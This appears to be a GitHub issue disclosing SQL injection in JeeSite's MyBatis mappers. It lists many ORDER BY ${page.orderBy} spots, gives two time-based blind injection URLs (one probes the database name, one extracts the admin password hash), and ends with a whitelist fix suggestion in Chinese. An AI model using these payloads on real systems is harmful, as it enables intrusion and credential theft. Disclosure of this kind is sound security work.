mybatis orderby sql injection
maybe-why-not opened this issue · comments
sql mappings
jeesite\src\main\resources\templates\modules\gen\dao\mapper.xml:
106 <choose>
107 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
108: ORDER BY ${"$"}{page.orderBy}
109 </when>
110 <otherwise>
...
132 <choose>
133 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
134: ORDER BY ${"$"}{page.orderBy}
135 </when>
136 <otherwise>
jeesite\src\main\resources\mappings\modules\sys\UserDao.xml:
188 <choose>###
189 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
190: ORDER BY ${page.orderBy}
191 </when>
192 <otherwise>
jeesite\src\main\resources\mappings\modules\gen\GenTableDao.xml:
45 <choose>###
46 <when test="page.orderBy != null and page.orderBy != ''">
47: ORDER BY ${page.orderBy}
48 </when>
49 <otherwise>
..
60 <choose>
61 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
62: ORDER BY ${page.orderBy}
63 </when>
64 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\ArticleDao.xml:
80 <choose>
81 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
82: ORDER BY ${page.orderBy}
83 </when>
84 <otherwise>
..
98 <choose>
99 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
100: ORDER BY ${page.orderBy}
101 </when>
102 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\CategoryDao.xml:
90 <choose>
91 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
92: ORDER BY ${page.orderBy}
93 </when>
94 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\CommentDao.xml:
44 <choose>
45 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
46: ORDER BY ${page.orderBy}
47 </when>
48 <otherwise>
..
62 <choose>
63 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
64: ORDER BY ${page.orderBy}
65 </when>
66 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\GuestbookDao.xml:
42 <choose>
43 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
44: ORDER BY ${page.orderBy}
45 </when>
46 <otherwise>
..
60 <choose>
61 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
62: ORDER BY ${page.orderBy}
63 </when>
64 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\LinkDao.xml:
51 <choose>
52 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
53: ORDER BY ${page.orderBy}
54 </when>
55 <otherwise>
..
69 <choose>
70 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
71: ORDER BY ${page.orderBy}
72 </when>
73 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\SiteDao.xml:
49 <choose>
50 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
51: ORDER BY ${page.orderBy}
52 </when>
53 <otherwise>
..
67 <choose>
68 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
69: ORDER BY ${page.orderBy}
70 </when>
71 <otherwise>
jeesite\src\main\resources\mappings\jeesite\test\TestDataChildDao.xml:
46 <choose>###
47 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
48: ORDER BY ${page.orderBy}
49 </when>
50 <otherwise>
..
64 <choose>
65 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
66: ORDER BY ${page.orderBy}
67 </when>
68 <otherwise>
jeesite\src\main\resources\mappings\jeesite\test\TestDataDao.xml:
67 <choose>
68 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
69: ORDER BY ${page.orderBy}
70 </when>
71 <otherwise>
..
85 <choose>
86 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
87: ORDER BY ${page.orderBy}
88 </when>
89 <otherwise>
jeesite\src\main\resources\mappings\jeesite\test\TestDataMainDao.xml:
58 <choose>
59 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
60: ORDER BY ${page.orderBy}
61 </when>
62 <otherwise>
..
76 <choose>
77 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
78: ORDER BY ${page.orderBy}
79 </when>
80 <otherwise>
RequestMapping
sys/user/list
gen/genTable/list
gen/genTable/form
gen/genTable/save
gen/genScheme/form
gen/genScheme/save
...
time base sql injection
url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(database()!=0x6a656573697465,1,sleep(0.3))
admin's password
url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(cu.password!=0x3032613366303737326663636139663431356164633939303733346234356336663035396337643333656532383336326334383532303332,1,sleep(3))&pageSize=1&id=1
修复建议
建议orderby的过滤规则和普通过滤分开写,orderby白名单,[a-z0-9_],普通过滤用黑名单